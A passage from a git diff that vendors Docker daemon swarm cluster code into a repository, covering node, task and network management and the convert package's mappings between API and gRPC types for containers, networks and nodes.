!c.isActiveManager() { + return nil, c.errNoManager() + } + + filters, err := newListNodesFilters(options.Filters) + if err != nil { + return nil, err + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := c.client.ListNodes( + ctx, + &swarmapi.ListNodesRequest{Filters: filters}) + if err != nil { + return nil, err + } + + nodes := []types.Node{} + + for _, node := range r.Nodes { + nodes = append(nodes, convert.NodeFromGRPC(*node)) + } + return nodes, nil +} + +// GetNode returns a node based on an ID or name. +func (c *Cluster) GetNode(input string) (types.Node, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return types.Node{}, c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + node, err := getNode(ctx, c.client, input) + if err != nil { + return types.Node{}, err + } + return convert.NodeFromGRPC(*node), nil +} + +// UpdateNode updates existing nodes properties. +func (c *Cluster) UpdateNode(input string, version uint64, spec types.NodeSpec) error { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return c.errNoManager() + } + + nodeSpec, err := convert.NodeSpecToGRPC(spec) + if err != nil { + return err + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + currentNode, err := getNode(ctx, c.client, input) + if err != nil { + return err + } + + _, err = c.client.UpdateNode( + ctx, + &swarmapi.UpdateNodeRequest{ + NodeID: currentNode.ID, + Spec: &nodeSpec, + NodeVersion: &swarmapi.Version{ + Index: version, + }, + }, + ) + return err +} + +// RemoveNode removes a node from a cluster +func (c *Cluster) RemoveNode(input string, force bool) error { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + node, err := getNode(ctx, c.client, input) + if err != nil { + return err + } + + if _, err := c.client.RemoveNode(ctx, &swarmapi.RemoveNodeRequest{NodeID: node.ID, Force: force}); err != nil { + return err + } + return nil +} + +// GetTasks returns a list of tasks matching the filter options. +func (c *Cluster) GetTasks(options apitypes.TaskListOptions) ([]types.Task, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return nil, c.errNoManager() + } + + byName := func(filter filters.Args) error { + if filter.Include("service") { + serviceFilters := filter.Get("service") + for _, serviceFilter := range serviceFilters { + service, err := c.GetService(serviceFilter) + if err != nil { + return err + } + filter.Del("service", serviceFilter) + filter.Add("service", service.ID) + } + } + if filter.Include("node") { + nodeFilters := filter.Get("node") + for _, nodeFilter := range nodeFilters { + node, err := c.GetNode(nodeFilter) + if err != nil { + return err + } + filter.Del("node", nodeFilter) + filter.Add("node", node.ID) + } + } + return nil + } + + filters, err := newListTasksFilters(options.Filters, byName) + if err != nil { + return nil, err + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := c.client.ListTasks( + ctx, + &swarmapi.ListTasksRequest{Filters: filters}) + if err != nil { + return nil, err + } + + tasks := []types.Task{} + + for _, task := range r.Tasks { + if task.Spec.GetContainer() != nil { + tasks = append(tasks, convert.TaskFromGRPC(*task)) + } + } + return tasks, nil +} + +// GetTask returns a task by an ID. +func (c *Cluster) GetTask(input string) (types.Task, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return types.Task{}, c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + task, err := getTask(ctx, c.client, input) + if err != nil { + return types.Task{}, err + } + return convert.TaskFromGRPC(*task), nil +} + +// GetNetwork returns a cluster network by an ID. +func (c *Cluster) GetNetwork(input string) (apitypes.NetworkResource, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return apitypes.NetworkResource{}, c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + network, err := getNetwork(ctx, c.client, input) + if err != nil { + return apitypes.NetworkResource{}, err + } + return convert.BasicNetworkFromGRPC(*network), nil +} + +func (c *Cluster) getNetworks(filters *swarmapi.ListNetworksRequest_Filters) ([]apitypes.NetworkResource, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return nil, c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := c.client.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: filters}) + if err != nil { + return nil, err + } + + var networks []apitypes.NetworkResource + + for _, network := range r.Networks { + networks = append(networks, convert.BasicNetworkFromGRPC(*network)) + } + + return networks, nil +} + +// GetNetworks returns all current cluster managed networks. +func (c *Cluster) GetNetworks() ([]apitypes.NetworkResource, error) { + return c.getNetworks(nil) +} + +// GetNetworksByName returns cluster managed networks by name. +// It is ok to have multiple networks here. #18864 +func (c *Cluster) GetNetworksByName(name string) ([]apitypes.NetworkResource, error) { + // Note that swarmapi.GetNetworkRequest.Name is not functional. + // So we cannot just use that with c.GetNetwork. + return c.getNetworks(&swarmapi.ListNetworksRequest_Filters{ + Names: []string{name}, + }) +} + +func attacherKey(target, containerID string) string { + return containerID + ":" + target +} + +// UpdateAttachment signals the attachment config to the attachment +// waiter who is trying to start or attach the container to the +// network. +func (c *Cluster) UpdateAttachment(target, containerID string, config *network.NetworkingConfig) error { + c.RLock() + attacher, ok := c.attachers[attacherKey(target, containerID)] + c.RUnlock() + if !ok || attacher == nil { + return fmt.Errorf("could not find attacher for container %s to network %s", containerID, target) + } + + attacher.attachWaitCh <- config + close(attacher.attachWaitCh) + return nil +} + +// WaitForDetachment waits for the container to stop or detach from +// the network. +func (c *Cluster) WaitForDetachment(ctx context.Context, networkName, networkID, taskID, containerID string) error { + c.RLock() + attacher, ok := c.attachers[attacherKey(networkName, containerID)] + if !ok { + attacher, ok = c.attachers[attacherKey(networkID, containerID)] + } + if c.node == nil || c.node.Agent() == nil { + c.RUnlock() + return fmt.Errorf("invalid cluster node while waiting for detachment") + } + + agent := c.node.Agent() + c.RUnlock() + + if ok && attacher != nil && + attacher.detachWaitCh != nil && + attacher.attachCompleteCh != nil { + // Attachment may be in progress still so wait for + // attachment to complete. + select { + case <-attacher.attachCompleteCh: + case <-ctx.Done(): + return ctx.Err() + } + + if attacher.taskID == taskID { + select { + case <-attacher.detachWaitCh: + case <-ctx.Done(): + return ctx.Err() + } + } + } + + return agent.ResourceAllocator().DetachNetwork(ctx, taskID) +} + +// AttachNetwork generates an attachment request towards the manager. +func (c *Cluster) AttachNetwork(target string, containerID string, addresses []string) (*network.NetworkingConfig, error) { + aKey := attacherKey(target, containerID) + c.Lock() + if c.node == nil || c.node.Agent() == nil { + c.Unlock() + return nil, fmt.Errorf("invalid cluster node while attaching to network") + } + if attacher, ok := c.attachers[aKey]; ok { + c.Unlock() + return attacher.config, nil + } + + agent := c.node.Agent() + attachWaitCh := make(chan *network.NetworkingConfig) + detachWaitCh := make(chan struct{}) + attachCompleteCh := make(chan struct{}) + c.attachers[aKey] = &attacher{ + attachWaitCh: attachWaitCh, + attachCompleteCh: attachCompleteCh, + detachWaitCh: detachWaitCh, + } + c.Unlock() + + ctx, cancel := c.getRequestContext() + defer cancel() + + taskID, err := agent.ResourceAllocator().AttachNetwork(ctx, containerID, target, addresses) + if err != nil { + c.Lock() + delete(c.attachers, aKey) + c.Unlock() + return nil, fmt.Errorf("Could not attach to network %s: %v", target, err) + } + + c.Lock() + c.attachers[aKey].taskID = taskID + close(attachCompleteCh) + c.Unlock() + + logrus.Debugf("Successfully attached to network %s with tid %s", target, taskID) + + var config *network.NetworkingConfig + select { + case config = <-attachWaitCh: + case <-ctx.Done(): + return nil, fmt.Errorf("attaching to network failed, make sure your network options are correct and check manager logs: %v", ctx.Err()) + } + + c.Lock() + c.attachers[aKey].config = config + c.Unlock() + return config, nil +} + +// DetachNetwork unblocks the waiters waiting on WaitForDetachment so +// that a request to detach can be generated towards the manager. +func (c *Cluster) DetachNetwork(target string, containerID string) error { + aKey := attacherKey(target, containerID) + + c.Lock() + attacher, ok := c.attachers[aKey] + delete(c.attachers, aKey) + c.Unlock() + + if !ok { + return fmt.Errorf("could not find network attachment for container %s to network %s", containerID, target) + } + + close(attacher.detachWaitCh) + return nil +} + +// CreateNetwork creates a new cluster managed network. +func (c *Cluster) CreateNetwork(s apitypes.NetworkCreateRequest) (string, error) { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return "", c.errNoManager() + } + + if runconfig.IsPreDefinedNetwork(s.Name) { + err := fmt.Errorf("%s is a pre-defined network and cannot be created", s.Name) + return "", apierrors.NewRequestForbiddenError(err) + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + networkSpec := convert.BasicNetworkCreateToGRPC(s) + r, err := c.client.CreateNetwork(ctx, &swarmapi.CreateNetworkRequest{Spec: &networkSpec}) + if err != nil { + return "", err + } + + return r.Network.ID, nil +} + +// RemoveNetwork removes a cluster network. +func (c *Cluster) RemoveNetwork(input string) error { + c.RLock() + defer c.RUnlock() + + if !c.isActiveManager() { + return c.errNoManager() + } + + ctx, cancel := c.getRequestContext() + defer cancel() + + network, err := getNetwork(ctx, c.client, input) + if err != nil { + return err + } + + if _, err := c.client.RemoveNetwork(ctx, &swarmapi.RemoveNetworkRequest{NetworkID: network.ID}); err != nil { + return err + } + return nil +} + +func (c *Cluster) populateNetworkID(ctx context.Context, client swarmapi.ControlClient, s *types.ServiceSpec) error { + // Always prefer NetworkAttachmentConfigs from TaskTemplate + // but fallback to service spec for backward compatibility + networks := s.TaskTemplate.Networks + if len(networks) == 0 { + networks = s.Networks + } + + for i, n := range networks { + apiNetwork, err := getNetwork(ctx, client, n.Target) + if err != nil { + if ln, _ := c.config.Backend.FindNetwork(n.Target); ln != nil && !ln.Info().Dynamic() { + err = fmt.Errorf("The network %s cannot be used with services. Only networks scoped to the swarm can be used, such as those created with the overlay driver.", ln.Name()) + return apierrors.NewRequestForbiddenError(err) + } + return err + } + networks[i].Target = apiNetwork.ID + } + return nil +} + +func getNetwork(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Network, error) { + // GetNetwork to match via full ID. + rg, err := c.GetNetwork(ctx, &swarmapi.GetNetworkRequest{NetworkID: input}) + if err != nil { + // If any error (including NotFound), ListNetworks to match via ID prefix and full name. + rl, err := c.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: &swarmapi.ListNetworksRequest_Filters{Names: []string{input}}}) + if err != nil || len(rl.Networks) == 0 { + rl, err = c.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: &swarmapi.ListNetworksRequest_Filters{IDPrefixes: []string{input}}}) + } + + if err != nil { + return nil, err + } + + if len(rl.Networks) == 0 { + return nil, fmt.Errorf("network %s not found", input) + } + + if l := len(rl.Networks); l > 1 { + return nil, fmt.Errorf("network %s is ambiguous (%d matches found)", input, l) + } + + return rl.Networks[0], nil + } + return rg.Network, nil +} + +// Cleanup stops active swarm node. This is run before daemon shutdown. +func (c *Cluster) Cleanup() { + c.Lock() + node := c.node + if node == nil { + c.Unlock() + return + } + defer c.Unlock() + if c.isActiveManager() { + active, reachable, unreachable, err := c.managerStats() + if err == nil { + singlenode := active && isLastManager(reachable, unreachable) + if active && !singlenode && removingManagerCausesLossOfQuorum(reachable, unreachable) { + logrus.Errorf("Leaving cluster with %v managers left out of %v. Raft quorum will be lost.", reachable-1, reachable+unreachable) + } + } + } + c.stopNode() +} + +func (c *Cluster) managerStats() (current bool, reachable int, unreachable int, err error) { + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + nodes, err := c.client.ListNodes(ctx, &swarmapi.ListNodesRequest{}) + if err != nil { + return false, 0, 0, err + } + for _, n := range nodes.Nodes { + if n.ManagerStatus != nil { + if n.ManagerStatus.Reachability == swarmapi.RaftMemberStatus_REACHABLE { + reachable++ + if n.ID == c.node.NodeID() { + current = true + } + } + if n.ManagerStatus.Reachability == swarmapi.RaftMemberStatus_UNREACHABLE { + unreachable++ + } + } + } + return +} + +func validateAndSanitizeInitRequest(req *types.InitRequest) error { + var err error + req.ListenAddr, err = validateAddr(req.ListenAddr) + if err != nil { + return fmt.Errorf("invalid ListenAddr %q: %v", req.ListenAddr, err) + } + + if req.Spec.Annotations.Name == "" { + req.Spec.Annotations.Name = "default" + } else if req.Spec.Annotations.Name != "default" { + return errors.New(`swarm spec must be named "default"`) + } + + return nil +} + +func validateAndSanitizeJoinRequest(req *types.JoinRequest) error { + var err error + req.ListenAddr, err = validateAddr(req.ListenAddr) + if err != nil { + return fmt.Errorf("invalid ListenAddr %q: %v", req.ListenAddr, err) + } + if len(req.RemoteAddrs) == 0 { + return fmt.Errorf("at least 1 RemoteAddr is required to join") + } + for i := range req.RemoteAddrs { + req.RemoteAddrs[i], err = validateAddr(req.RemoteAddrs[i]) + if err != nil { + return fmt.Errorf("invalid remoteAddr %q: %v", req.RemoteAddrs[i], err) + } + } + return nil +} + +func validateAddr(addr string) (string, error) { + if addr == "" { + return addr, fmt.Errorf("invalid empty address") + } + newaddr, err := opts.ParseTCPAddr(addr, defaultAddr) + if err != nil { + return addr, nil + } + return strings.TrimPrefix(newaddr, "tcp://"), nil +} + +func initClusterSpec(node *node, spec types.Spec) error { + ctx, _ := context.WithTimeout(context.Background(), 5*time.Second) + for conn := range node.ListenControlSocket(ctx) { + if ctx.Err() != nil { + return ctx.Err() + } + if conn != nil { + client := swarmapi.NewControlClient(conn) + var cluster *swarmapi.Cluster + for i := 0; ; i++ { + lcr, err := client.ListClusters(ctx, &swarmapi.ListClustersRequest{}) + if err != nil { + return fmt.Errorf("error on listing clusters: %v", err) + } + if len(lcr.Clusters) == 0 { + if i < 10 { + time.Sleep(200 * time.Millisecond) + continue + } + return fmt.Errorf("empty list of clusters was returned") + } + cluster = lcr.Clusters[0] + break + } + // In init, we take the initial default values from swarmkit, and merge + // any non nil or 0 value from spec to GRPC spec. This will leave the + // default value alone. + // Note that this is different from Update(), as in Update() we expect + // user to specify the complete spec of the cluster (as they already know + // the existing one and knows which field to update) + clusterSpec, err := convert.MergeSwarmSpecToGRPC(spec, cluster.Spec) + if err != nil { + return fmt.Errorf("error updating cluster settings: %v", err) + } + _, err = client.UpdateCluster(ctx, &swarmapi.UpdateClusterRequest{ + ClusterID: cluster.ID, + ClusterVersion: &cluster.Meta.Version, + Spec: &clusterSpec, + }) + if err != nil { + return fmt.Errorf("error updating cluster settings: %v", err) + } + return nil + } + } + return ctx.Err() +} + +func detectLockedError(err error) error { + if err == swarmnode.ErrInvalidUnlockKey { + return errors.WithStack(ErrSwarmLocked) + } + return err +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/container.go b/vendor/github.com/docker/docker/daemon/cluster/convert/container.go new file mode 100644 index 0000000000..10383f749b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/container.go @@ -0,0 +1,235 @@ +package convert + +import ( + "fmt" + "strings" + + "github.com/Sirupsen/logrus" + container "github.com/docker/docker/api/types/container" + mounttypes "github.com/docker/docker/api/types/mount" + types "github.com/docker/docker/api/types/swarm" + swarmapi "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/protobuf/ptypes" +) + +func containerSpecFromGRPC(c *swarmapi.ContainerSpec) types.ContainerSpec { + containerSpec := types.ContainerSpec{ + Image: c.Image, + Labels: c.Labels, + Command: c.Command, + Args: c.Args, + Hostname: c.Hostname, + Env: c.Env, + Dir: c.Dir, + User: c.User, + Groups: c.Groups, + TTY: c.TTY, + OpenStdin: c.OpenStdin, + Hosts: c.Hosts, + Secrets: secretReferencesFromGRPC(c.Secrets), + } + + if c.DNSConfig != nil { + containerSpec.DNSConfig = &types.DNSConfig{ + Nameservers: c.DNSConfig.Nameservers, + Search: c.DNSConfig.Search, + Options: c.DNSConfig.Options, + } + } + + // Mounts + for _, m := range c.Mounts { + mount := mounttypes.Mount{ + Target: m.Target, + Source: m.Source, + Type: mounttypes.Type(strings.ToLower(swarmapi.Mount_MountType_name[int32(m.Type)])), + ReadOnly: m.ReadOnly, + } + + if m.BindOptions != nil { + mount.BindOptions = &mounttypes.BindOptions{ + Propagation: mounttypes.Propagation(strings.ToLower(swarmapi.Mount_BindOptions_MountPropagation_name[int32(m.BindOptions.Propagation)])), + } + } + + if m.VolumeOptions != nil { + mount.VolumeOptions = &mounttypes.VolumeOptions{ + NoCopy: m.VolumeOptions.NoCopy, + Labels: m.VolumeOptions.Labels, + } + if m.VolumeOptions.DriverConfig != nil { + mount.VolumeOptions.DriverConfig = &mounttypes.Driver{ + Name: m.VolumeOptions.DriverConfig.Name, + Options: m.VolumeOptions.DriverConfig.Options, + } + } + } + + if m.TmpfsOptions != nil { + mount.TmpfsOptions = &mounttypes.TmpfsOptions{ + SizeBytes: m.TmpfsOptions.SizeBytes, + Mode: m.TmpfsOptions.Mode, + } + } + containerSpec.Mounts = append(containerSpec.Mounts, mount) + } + + if c.StopGracePeriod != nil { + grace, _ := ptypes.Duration(c.StopGracePeriod) + containerSpec.StopGracePeriod = &grace + } + + if c.Healthcheck != nil { + containerSpec.Healthcheck = healthConfigFromGRPC(c.Healthcheck) + } + + return containerSpec +} + +func secretReferencesToGRPC(sr []*types.SecretReference) []*swarmapi.SecretReference { + refs := make([]*swarmapi.SecretReference, 0, len(sr)) + for _, s := range sr { + ref := &swarmapi.SecretReference{ + SecretID: s.SecretID, + SecretName: s.SecretName, + } + if s.File != nil { + ref.Target = &swarmapi.SecretReference_File{ + File: &swarmapi.SecretReference_FileTarget{ + Name: s.File.Name, + UID: s.File.UID, + GID: s.File.GID, + Mode: s.File.Mode, + }, + } + } + + refs = append(refs, ref) + } + + return refs +} +func secretReferencesFromGRPC(sr []*swarmapi.SecretReference) []*types.SecretReference { + refs := make([]*types.SecretReference, 0, len(sr)) + for _, s := range sr { + target := s.GetFile() + if target == nil { + // not a file target + logrus.Warnf("secret target not a file: secret=%s", s.SecretID) + continue + } + refs = append(refs, &types.SecretReference{ + File: &types.SecretReferenceFileTarget{ + Name: target.Name, + UID: target.UID, + GID: target.GID, + Mode: target.Mode, + }, + SecretID: s.SecretID, + SecretName: s.SecretName, + }) + } + + return refs +} + +func containerToGRPC(c types.ContainerSpec) (*swarmapi.ContainerSpec, error) { + containerSpec := &swarmapi.ContainerSpec{ + Image: c.Image, + Labels: c.Labels, + Command: c.Command, + Args: c.Args, + Hostname: c.Hostname, + Env: c.Env, + Dir: c.Dir, + User: c.User, + Groups: c.Groups, + TTY: c.TTY, + OpenStdin: c.OpenStdin, + Hosts: c.Hosts, + Secrets: secretReferencesToGRPC(c.Secrets), + } + + if c.DNSConfig != nil { + containerSpec.DNSConfig = &swarmapi.ContainerSpec_DNSConfig{ + Nameservers: c.DNSConfig.Nameservers, + Search: c.DNSConfig.Search, + Options: c.DNSConfig.Options, + } + } + + if c.StopGracePeriod != nil { + containerSpec.StopGracePeriod = ptypes.DurationProto(*c.StopGracePeriod) + } + + // Mounts + for _, m := range c.Mounts { + mount := swarmapi.Mount{ + Target: m.Target, + Source: m.Source, + ReadOnly: m.ReadOnly, + } + + if mountType, ok := swarmapi.Mount_MountType_value[strings.ToUpper(string(m.Type))]; ok { + mount.Type = swarmapi.Mount_MountType(mountType) + } else if string(m.Type) != "" { + return nil, fmt.Errorf("invalid MountType: %q", m.Type) + } + + if m.BindOptions != nil { + if mountPropagation, ok := swarmapi.Mount_BindOptions_MountPropagation_value[strings.ToUpper(string(m.BindOptions.Propagation))]; ok { + mount.BindOptions = &swarmapi.Mount_BindOptions{Propagation: swarmapi.Mount_BindOptions_MountPropagation(mountPropagation)} + } else if string(m.BindOptions.Propagation) != "" { + return nil, fmt.Errorf("invalid MountPropagation: %q", m.BindOptions.Propagation) + } + } + + if m.VolumeOptions != nil { + mount.VolumeOptions = &swarmapi.Mount_VolumeOptions{ + NoCopy: m.VolumeOptions.NoCopy, + Labels: m.VolumeOptions.Labels, + } + if m.VolumeOptions.DriverConfig != nil { + mount.VolumeOptions.DriverConfig = &swarmapi.Driver{ + Name: m.VolumeOptions.DriverConfig.Name, + Options: m.VolumeOptions.DriverConfig.Options, + } + } + } + + if m.TmpfsOptions != nil { + mount.TmpfsOptions = &swarmapi.Mount_TmpfsOptions{ + SizeBytes: m.TmpfsOptions.SizeBytes, + Mode: m.TmpfsOptions.Mode, + } + } + + containerSpec.Mounts = append(containerSpec.Mounts, mount) + } + + if c.Healthcheck != nil { + containerSpec.Healthcheck = healthConfigToGRPC(c.Healthcheck) + } + + return containerSpec, nil +} + +func healthConfigFromGRPC(h *swarmapi.HealthConfig) *container.HealthConfig { + interval, _ := ptypes.Duration(h.Interval) + timeout, _ := ptypes.Duration(h.Timeout) + return &container.HealthConfig{ + Test: h.Test, + Interval: interval, + Timeout: timeout, + Retries: int(h.Retries), + } +} + +func healthConfigToGRPC(h *container.HealthConfig) *swarmapi.HealthConfig { + return &swarmapi.HealthConfig{ + Test: h.Test, + Interval: ptypes.DurationProto(h.Interval), + Timeout: ptypes.DurationProto(h.Timeout), + Retries: int32(h.Retries), + } +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/network.go b/vendor/github.com/docker/docker/daemon/cluster/convert/network.go new file mode 100644 index 0000000000..4d21b4df0a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/network.go @@ -0,0 +1,210 @@ +package convert + +import ( + "strings" + + basictypes "github.com/docker/docker/api/types" + networktypes "github.com/docker/docker/api/types/network" + types "github.com/docker/docker/api/types/swarm" + swarmapi "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/protobuf/ptypes" +) + +func networkAttachementFromGRPC(na *swarmapi.NetworkAttachment) types.NetworkAttachment { + if na != nil { + return types.NetworkAttachment{ + Network: networkFromGRPC(na.Network), + Addresses: na.Addresses, + } + } + return types.NetworkAttachment{} +} + +func networkFromGRPC(n *swarmapi.Network) types.Network { + if n != nil { + network := types.Network{ + ID: n.ID, + Spec: types.NetworkSpec{ + IPv6Enabled: n.Spec.Ipv6Enabled, + Internal: n.Spec.Internal, + Attachable: n.Spec.Attachable, + IPAMOptions: ipamFromGRPC(n.Spec.IPAM), + }, + IPAMOptions: ipamFromGRPC(n.IPAM), + } + + // Meta + network.Version.Index = n.Meta.Version.Index + network.CreatedAt, _ = ptypes.Timestamp(n.Meta.CreatedAt) + network.UpdatedAt, _ = ptypes.Timestamp(n.Meta.UpdatedAt) + + //Annotations + network.Spec.Name = n.Spec.Annotations.Name + network.Spec.Labels = n.Spec.Annotations.Labels + + //DriverConfiguration + if n.Spec.DriverConfig != nil { + network.Spec.DriverConfiguration = &types.Driver{ + Name: n.Spec.DriverConfig.Name, + Options: n.Spec.DriverConfig.Options, + } + } + + //DriverState + if n.DriverState != nil { + network.DriverState = types.Driver{ + Name: n.DriverState.Name, + Options: n.DriverState.Options, + } + } + + return network + } + return types.Network{} +} + +func ipamFromGRPC(i *swarmapi.IPAMOptions) *types.IPAMOptions { + var ipam *types.IPAMOptions + if i != nil { + ipam = &types.IPAMOptions{} + if i.Driver != nil { + ipam.Driver.Name = i.Driver.Name + ipam.Driver.Options = i.Driver.Options + } + + for _, config := range i.Configs { + ipam.Configs = append(ipam.Configs, types.IPAMConfig{ + Subnet: config.Subnet, + Range: config.Range, + Gateway: config.Gateway, + }) + } + } + return ipam +} + +func endpointSpecFromGRPC(es *swarmapi.EndpointSpec) *types.EndpointSpec { + var endpointSpec *types.EndpointSpec + if es != nil { + endpointSpec = &types.EndpointSpec{} + endpointSpec.Mode = types.ResolutionMode(strings.ToLower(es.Mode.String())) + + for _, portState := range es.Ports { + endpointSpec.Ports = append(endpointSpec.Ports, types.PortConfig{ + Name: portState.Name, + Protocol: types.PortConfigProtocol(strings.ToLower(swarmapi.PortConfig_Protocol_name[int32(portState.Protocol)])), + PublishMode: types.PortConfigPublishMode(strings.ToLower(swarmapi.PortConfig_PublishMode_name[int32(portState.PublishMode)])), + TargetPort: portState.TargetPort, + PublishedPort: portState.PublishedPort, + }) + } + } + return endpointSpec +} + +func endpointFromGRPC(e *swarmapi.Endpoint) types.Endpoint { + endpoint := types.Endpoint{} + if e != nil { + if espec := endpointSpecFromGRPC(e.Spec); espec != nil { + endpoint.Spec = *espec + } + + for _, portState := range e.Ports { + endpoint.Ports = append(endpoint.Ports, types.PortConfig{ + Name: portState.Name, + Protocol: types.PortConfigProtocol(strings.ToLower(swarmapi.PortConfig_Protocol_name[int32(portState.Protocol)])), + PublishMode: types.PortConfigPublishMode(strings.ToLower(swarmapi.PortConfig_PublishMode_name[int32(portState.PublishMode)])), + TargetPort: portState.TargetPort, + PublishedPort: portState.PublishedPort, + }) + } + + for _, v := range e.VirtualIPs { + endpoint.VirtualIPs = append(endpoint.VirtualIPs, types.EndpointVirtualIP{ + NetworkID: v.NetworkID, + Addr: v.Addr}) + } + + } + + return endpoint +} + +// BasicNetworkFromGRPC converts a grpc Network to a NetworkResource. +func BasicNetworkFromGRPC(n swarmapi.Network) basictypes.NetworkResource { + spec := n.Spec + var ipam networktypes.IPAM + if spec.IPAM != nil { + if spec.IPAM.Driver != nil { + ipam.Driver = spec.IPAM.Driver.Name + ipam.Options = spec.IPAM.Driver.Options + } + ipam.Config = make([]networktypes.IPAMConfig, 0, len(spec.IPAM.Configs)) + for _, ic := range spec.IPAM.Configs { + ipamConfig := networktypes.IPAMConfig{ + Subnet: ic.Subnet, + IPRange: ic.Range, + Gateway: ic.Gateway, + AuxAddress: ic.Reserved, + } + ipam.Config = append(ipam.Config, ipamConfig) + } + } + + nr := basictypes.NetworkResource{ + ID: n.ID, + Name: n.Spec.Annotations.Name, + Scope: "swarm", + EnableIPv6: spec.Ipv6Enabled, + IPAM: ipam, + Internal: spec.Internal, + Attachable: spec.Attachable, + Labels: n.Spec.Annotations.Labels, + } + + if n.DriverState != nil { + nr.Driver = n.DriverState.Name + nr.Options = n.DriverState.Options + } + + return nr +} + +// BasicNetworkCreateToGRPC converts a NetworkCreateRequest to a grpc NetworkSpec. +func BasicNetworkCreateToGRPC(create basictypes.NetworkCreateRequest) swarmapi.NetworkSpec { + ns := swarmapi.NetworkSpec{ + Annotations: swarmapi.Annotations{ + Name: create.Name, + Labels: create.Labels, + }, + DriverConfig: &swarmapi.Driver{ + Name: create.Driver, + Options: create.Options, + }, + Ipv6Enabled: create.EnableIPv6, + Internal: create.Internal, + Attachable: create.Attachable, + } + if create.IPAM != nil { + driver := create.IPAM.Driver + if driver == "" { + driver = "default" + } + ns.IPAM = &swarmapi.IPAMOptions{ + Driver: &swarmapi.Driver{ + Name: driver, + Options: create.IPAM.Options, + }, + } + ipamSpec := make([]*swarmapi.IPAMConfig, 0, len(create.IPAM.Config)) + for _, ipamConfig := range create.IPAM.Config { + ipamSpec = append(ipamSpec, &swarmapi.IPAMConfig{ + Subnet: ipamConfig.Subnet, + Range: ipamConfig.IPRange, + Gateway: ipamConfig.Gateway, + }) + } + ns.IPAM.Configs = ipamSpec + } + return ns +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/node.go b/vendor/github.com/docker/docker/daemon/cluster/convert/node.go new file mode 100644 index 0000000000..306f34e0b2 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/node.go @@ -0,0 +1,89 @@ +package convert + +import ( + "fmt" + "strings" + + types "github.com/docker/docker/api/types/swarm" + swarmapi "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/protobuf/ptypes" +) + +// NodeFromGRPC converts a grpc Node to a Node. +func NodeFromGRPC(n swarmapi.Node) types.Node { + node := types.Node{ + ID: n.ID, + Spec: types.NodeSpec{ + Role: types.NodeRole(strings.ToLower(n.Spec.Role.String())), + Availability: types.NodeAvailability(strings.ToLower(n.Spec.Availability.String())), + }, + Status: types.NodeStatus{ + State: types.NodeState(strings.ToLower(n.Status.State.String())), + Message: n.Status.Message, + Addr: n.Status.Addr, + }, + } + + // Meta + node.Version.Index = n.Meta.Version.Index + node.CreatedAt, _ = ptypes.Timestamp(n.Meta.CreatedAt) + node.UpdatedAt, _ = ptypes.Timestamp(n.Meta.UpdatedAt) + + //Annotations + node.Spec.Name = n.Spec.Annotations.Name + node.Spec.Labels = n.Spec.Annotations.Labels + + //Description + if n.Description != nil { + node.Description.Hostname = n.Description.Hostname + if n.Description.Platform != nil { + node.Description.Platform.Architecture = n.Description.Platform.Architecture + node.Description.Platform.OS = n.Description.Platform.OS + } + if n.Description.Resources != nil { + node.Description.Resources.NanoCPUs = n.Description.Resources.NanoCPUs + node.Description.Resources.MemoryBytes = n.Description.Resources.MemoryBytes + } + if n.Description.Engine != nil { + node.Description.Engine.EngineVersion = n.Description.Engine.EngineVersion + node.Description.Engine.Labels = n.Description.Engine.Labels + for _, plugin := range n.Description.Engine.Plugins { + node.Description.Engine.Plugins = append(node.Description.Engine.Plugins, types.PluginDescription{Type: plugin.Type, Name: plugin.Name}) + } + } + } + + //Manager + if n.ManagerStatus != nil { + node.ManagerStatus = &types.ManagerStatus{ + Leader: n.ManagerStatus.Leader, + Reachability: types.Reachability(strings.ToLower(n.ManagerStatus.Reachability.String())), + Addr: n.ManagerStatus.Addr, + } + } + + return node +} + +// NodeSpecToGRPC converts a NodeSpec to a grpc NodeSpec. +func NodeSpecToGRPC(s types.NodeSpec) (swarmapi.NodeSpec, error) { + spec := swarmapi.NodeSpec{ + Annotations: swarmapi.Annotations{ + Name: s.Name, + Labels: s.Labels, + }, + } + if role, ok := swarmapi.NodeRole_value[strings.ToUpper(string(s.Role))]; ok { + spec.Role = swarmapi.NodeRole(role) + } else { + return swarmapi.NodeSpec{}, fmt.Errorf("invalid Role: %q", s.Role) + } + + if availability, ok := swarmapi.NodeSpec_Availability_value[strings.ToUpper(string(s.Availability))]; ok { + spec.Availability = swarmapi.NodeSpec_Availability(availability) + } else { + return swarmapi.NodeSpec{}, fmt.Errorf("invalid Availability: %q", s.Availability) + } + + return spec, nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go b/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go new file mode 100644 index 